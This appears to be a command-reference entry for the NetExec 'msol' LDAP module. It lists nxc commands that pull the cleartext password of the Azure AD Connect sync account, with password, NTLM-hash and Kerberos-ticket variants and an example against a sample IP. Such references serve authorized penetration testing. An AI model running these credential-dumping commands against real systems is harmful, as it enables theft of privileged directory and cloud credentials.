NetExec LDAP MSOL Account

Retrieve the cleartext password of the MSOL (Azure AD Connect) sync account

Tool
nxc
Category
Enumeration / LDAP
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc ldap '<ip>' -u '<user>' -p '<password>' -M msol

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc ldap '<ip>' -u '<user>' -H '<hash>' -M msol

Kerberos Ticket requires Kerberos ticket

nxc ldap '<ip>' -u '<user>' --use-kcache -M msol

Examples

nxc ldap '192.168.1.100' -u 'admin' -p 'password' -M msol

Tags

nxc ldap msol azure-ad-connect credential-dumping sync-account